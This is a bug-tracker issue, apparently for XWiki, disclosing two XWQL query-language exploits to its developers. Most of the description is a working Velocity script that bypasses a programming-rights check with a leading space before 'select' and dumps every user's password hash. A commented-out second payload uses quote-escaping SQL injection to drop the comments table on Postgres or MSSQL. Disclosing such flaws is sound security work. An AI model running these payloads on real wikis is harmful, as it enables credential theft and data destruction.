Details
-
Bug
-
Resolution: Cannot Reproduce
-
Major
-
None
-
2.4 M1
-
Unknown
-
Description
Here are 2 exploits for making XWQL select arbitrary data (and alter data on some databases.)
The first is embarrassingly simple to carry out. Apparently there is a proframming right check if the query test starts with "select" but it doesn't check if the first parser token is a select token resulting in the obvious " select" attack.
I think this query language is somewhat safer than HQL but only for the reason that the holes don't always line up between XWQL and HQL.
{{velocity}}
#if($xcontext.hasProgrammingRights())
You have PR, attacking is pointless
#end
#set($xqm = $xwiki.getQueryManager())
{{{
Queries starting with 'select' are banned but not starting with ' select'
Password hashes:
#foreach($user in $xqm.xwql(" select p, u from Document as doc, doc.object(XWiki.XWikiUsers) as u, StringProperty as p where p.id = u.id and p.name = 'password'").execute())
#foreach($el in $user)
$el
#end
#end
## Oh you again.
## this blows up with a error but the work gets done. (Only drop tables on Postgres or MSSQL, read anything in other DB's except HSQL)
##$xqm.xwql("where ''='\' or '; drop table xwikicomments; commit; --\' = doc.fullName").execute()
}}}
{{/velocity}}